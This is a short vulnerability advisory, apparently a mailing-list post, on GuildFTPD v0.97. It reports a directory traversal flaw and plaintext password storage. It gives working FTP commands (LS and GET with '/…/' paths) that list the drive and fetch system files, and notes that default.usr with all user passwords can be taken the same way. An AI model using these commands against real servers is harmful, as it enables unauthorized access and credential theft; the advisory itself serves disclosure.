GuildFTPD v0.97 Directory Traversal / Weak password
encryption

AFFECTED SYSTEMS

GuildFTPD v0.97
tested on Windows 9x, probably works on NT / 2k as
well

DESCRIPTION

1) Directory Traversal
Consider the following FTP session (I'm using windows'
FTP.EXE proggie, and its associated commands) :

The following commands :
CD …/
CD …/
CD /…/
CD c:\
etc…
all give "550 Access denied." errors, so the frontdoor
seems to be closed… The following stuff does work
however :

LS /…/*

This way, we can map out the whole harddrive…
other example : LS /…/…/windows/*

Now, to retrieve a file, do something like :

GET /…/windows/system.ini c:\received-file.txt

2)
And another thing… I don't want to whine to the guys
who wrote this program, but storing the user:password
pairs in plaintext in the program directory (the
default.usr & default?.usr files) is asking for
trouble : most ftp servers at least provide some way
of
encryption / hashing… when you combine this with the
traversal bug, anyone can get the passwords of all the
users by grabbing the default.usr file.

VENDOR STATUS

I have sent this advisory to both DrPhibez
<[email protected]> and Nitro187 (Matthew
Flewelling) <[email protected]>, the programmers of
GuildFTPD

=======================================================
[ByteRage] <[email protected]> [www.byterage.cjb.net]

Do You Yahoo!?
Yahoo! Auctions - buy the things you want at great prices
http://auctions.yahoo.com/